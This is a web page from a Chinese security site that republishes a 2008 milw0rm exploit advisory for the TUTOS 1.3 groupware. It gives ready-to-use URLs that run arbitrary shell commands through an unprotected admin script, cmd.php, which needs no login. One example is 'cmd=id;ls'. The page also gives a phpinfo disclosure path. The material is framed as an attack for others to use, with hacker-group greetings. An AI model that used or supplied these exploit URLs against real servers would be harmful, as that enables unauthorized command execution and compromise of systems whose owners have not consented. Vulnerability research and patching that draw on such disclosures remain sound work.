TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability - 华盟网

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华盟网 >> 漏洞 >> web apps >> 正文

用户登录

新用户注册

远程指挥执行漏洞

★★★

【字体：小大】

TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability

作者：milw0rm 文章来源：milw0rm 点击数：更新时间：2008-1-9

######################################################################################
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350}                                           #
# HOME : http://no-hack.net                #
# Script : TUTOS (Tested in version 1.3) other versions may also be affected.       #
# Download : http://www.tutos.org/homepage/index.html                                #
# BUG :      Command Execution Vulnerability                                         #
######################################################################################

(~)| 3xpl0it4t10n

-1- : Command Execution

    http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php?cmd=[your command]

   >> we dont need a permission admin for access to '/php/admin/cmd.php' :d

    exemple : http://site.com/tutos/php/admin/cmd.php?cmd=id;ls

or we can just enter into : http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php
and right the command in [ CMD(*) ] and press enter :d

-2- Get phpinfo

   http://[TARGEt]/[path_TUTOS]/php/admin/phpinfo.php

(~)| Explantion By Video :
     http://no-hack.net/video/tutos.zip

# greezt : CoNaN , GoLd_M , RoMaNcYxHaCkEr , and all muslims Hackers

######################################################################################
#                  H-T TeaM {HouSSaMix _ ToXiC350}                                   #
######################################################################################

# milw0rm.com

责任编辑：朱倩　　联系方式　Email：朱倩

电话：51228163

上一篇漏洞：远程代码执行的漏洞

下一篇漏洞：远程SQL注入利用漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画